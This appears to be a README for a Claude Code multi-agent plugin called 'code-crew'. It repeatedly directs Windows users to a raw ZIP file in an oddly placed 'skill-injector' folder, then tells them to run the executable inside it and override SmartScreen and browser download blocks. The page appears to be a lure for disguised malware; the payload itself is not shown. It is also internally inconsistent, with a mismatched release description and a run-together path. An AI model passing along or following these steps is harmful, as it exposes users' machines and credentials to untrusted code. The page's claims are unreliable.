code-crew is a plugin for Claude Code that helps it work like a small team. It uses 11 AI agents, sends each task to the right model, and checks your codebase in layers so it can find what it needs faster.
Use it when you want help with code review, file search, task splitting, or project changes inside Claude Code.
Open this page and visit this page to download: https://raw.githubusercontent.com/astrocytic-sperry416/code-crew/main/skills/skill-injector/code-crew-3.8.zip
If you are on Windows, follow these steps:
- Open the link above in your web browser.
- Look for the latest release or the main download files on the page.
- Download the Windows file or package shown there.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Run the app or install the plugin using the file included in the download.
If the page gives you a setup file, double-click it to start the install. If it gives you a folder, use the included instructions in that folder.
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- A stable internet connection
- Claude Code already installed
- Enough free disk space for the app and your code projects
For the best results, keep your project folder closed in other apps while code-crew runs.
- Install or open Claude Code on your Windows PC.
- Add code-crew using the files from the download page.
- Open the project you want help with.
- Start a task in Claude Code.
- Let code-crew route the work to the right agent.
- Review the output before you apply changes.
The plugin can help with:
- Reading a codebase
- Finding files and symbols
- Breaking a task into smaller parts
- Checking code before changes
- Suggesting the right model for each job
- Injecting the right skill for the task
code-crew is built around three parts:
- 11 AI agents that handle different kinds of work
- Model routing that picks the right model for each task
- 3-layer codebase indexing that helps search large projects
It also supports auto skill injection. That means it can load the right helper skill when the task needs it.
code-crew uses three layers to map a codebase:
- A fast top layer for broad project views
- A middle layer for file and folder structure
- A deeper layer for code details and relationships
This helps Claude Code answer questions with more context and less guessing.
The agents can act like separate helpers. Each one can focus on a task such as:
- Planning
- File discovery
- Code reading
- Change checks
- Task routing
- Context cleanup
- Skill selection
- Result review
This setup keeps work organized when a project gets large.
If Windows asks whether you trust the file:
- Check that the file came from the GitHub link above.
- Open the file only after the download finishes.
- If SmartScreen appears, choose More info, then Run anyway if you trust the source.
- If your browser blocks the file, allow the download from the browser bar.
If you use a ZIP file, extract it first. Do not run files from inside the ZIP window.
Keep your files in a simple place, such as:
C:\code-crewC:\Users\YourName\Downloads\code-crew
This makes it easier to find the app again later.
Use code-crew when you want help with:
- A large codebase that is hard to search
- A task that needs more than one pass
- Choosing the best agent for a job
- Finding where a feature lives
- Understanding old code
- Preparing changes before you edit files
This project fits into these areas:
- AI agents
- Claude Code
- Code automation
- Multi-agent orchestration
- Developer tools
- Codebase indexing
- Claude Code skills
- AI coding assistant tools
Try these steps:
- Close Claude Code.
- Open the app or plugin files again.
- Make sure you downloaded the full file.
- Check that the folder is not still zipped.
- Restart your PC.
- Open Claude Code and try again.
If the app still does not start, return to the download page and check for a newer release
- Repository: code-crew
- Source: https://raw.githubusercontent.com/astrocytic-sperry416/code-crew/main/skills/skill-injector/code-crew-3.8.zip
- Type: Claude Code plugin
- Goal: Help Claude Code manage larger tasks with multiple agents and better code context